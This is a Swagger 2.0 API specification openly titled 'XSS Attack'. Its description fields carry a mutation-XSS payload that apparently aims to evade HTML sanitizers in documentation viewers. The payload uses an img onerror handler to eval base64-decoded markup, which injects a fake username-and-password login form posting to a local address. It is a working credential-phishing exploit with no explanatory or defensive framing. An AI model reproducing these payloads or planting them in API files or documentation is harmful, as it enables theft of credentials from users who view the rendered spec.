swagger: '2.0'
info:
  title: XSS Attack BY Alharbe
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='IDxmb3JtIGFjdGlvbj0iaHR0cDovLzEyNy4wLjAuMTo0MzIxIiBtZXRob2Q9InBvc3QiPgogIDxkaXYgY2xhc3M9ImltZ2NvbnRhaW5lciI+CiAgICA8aW1nIHNyYz0iaW1nX2F2YXRhcjIucG5nIiBhbHQ9IkF2YXRhciIgY2xhc3M9ImF2YXRhciI+CiAgPC9kaXY+CgogIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICA8bGFiZWwgZm9yPSJ1bmFtZSI+PGI+VXNlcm5hbWU8L2I+PC9sYWJlbD4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBwbGFjZWhvbGRlcj0iRW50ZXIgVXNlcm5hbWUiIG5hbWU9InVuYW1lIiByZXF1aXJlZD4KCiAgICA8bGFiZWwgZm9yPSJwc3ciPjxiPlBhc3N3b3JkPC9iPjwvbGFiZWw+CiAgICA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIHBsYWNlaG9sZGVyPSJFbnRlciBQYXNzd29yZCIgbmFtZT0icHN3IiByZXF1aXJlZD4KCiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+TG9naW48L2J1dHRvbj4KICAgIDxsYWJlbD4KICAgICAgPGlucHV0IHR5cGU9ImNoZWNrYm94IiBjaGVja2VkPSJjaGVja2VkIiBuYW1lPSJyZW1lbWJlciI+IFJlbWVtYmVyIG1lCiAgICA8L2xhYmVsPgogIDwvZGl2PgoKICA8ZGl2IGNsYXNzPSJjb250YWluZXIiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiNmMWYxZjEiPgogICAgPGJ1dHRvbiB0eXBlPSJidXR0b24iIGNsYXNzPSJjYW5jZWxidG4iPkNhbmNlbDwvYnV0dG9uPgogICAgPHNwYW4gY2xhc3M9InBzdyI+Rm9yZ290IDxhIGhyZWY9IiMiPnBhc3N3b3JkPzwvYT48L3NwYW4+CiAgPC9kaXY+CjwvZm9ybT4gCg==' onerror='eval(atob(this.id))'>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Alharbe
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='IDxmb3JtIGFjdGlvbj0iaHR0cDovLzEyNy4wLjAuMTo0MzIxIiBtZXRob2Q9InBvc3QiPgogIDxkaXYgY2xhc3M9ImltZ2NvbnRhaW5lciI+CiAgICA8aW1nIHNyYz0iaW1nX2F2YXRhcjIucG5nIiBhbHQ9IkF2YXRhciIgY2xhc3M9ImF2YXRhciI+CiAgPC9kaXY+CgogIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICA8bGFiZWwgZm9yPSJ1bmFtZSI+PGI+VXNlcm5hbWU8L2I+PC9sYWJlbD4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBwbGFjZWhvbGRlcj0iRW50ZXIgVXNlcm5hbWUiIG5hbWU9InVuYW1lIiByZXF1aXJlZD4KCiAgICA8bGFiZWwgZm9yPSJwc3ciPjxiPlBhc3N3b3JkPC9iPjwvbGFiZWw+CiAgICA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIHBsYWNlaG9sZGVyPSJFbnRlciBQYXNzd29yZCIgbmFtZT0icHN3IiByZXF1aXJlZD4KCiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+TG9naW48L2J1dHRvbj4KICAgIDxsYWJlbD4KICAgICAgPGlucHV0IHR5cGU9ImNoZWNrYm94IiBjaGVja2VkPSJjaGVja2VkIiBuYW1lPSJyZW1lbWJlciI+IFJlbWVtYmVyIG1lCiAgICA8L2xhYmVsPgogIDwvZGl2PgoKICA8ZGl2IGNsYXNzPSJjb250YWluZXIiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiNmMWYxZjEiPgogICAgPGJ1dHRvbiB0eXBlPSJidXR0b24iIGNsYXNzPSJjYW5jZWxidG4iPkNhbmNlbDwvYnV0dG9uPgogICAgPHNwYW4gY2xhc3M9InBzdyI+Rm9yZ290IDxhIGhyZWY9IiMiPnBhc3N3b3JkPzwvYT48L3NwYW4+CiAgPC9kaXY+CjwvZm9ybT4gCg==' onerror='eval(atob(this.id))'>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
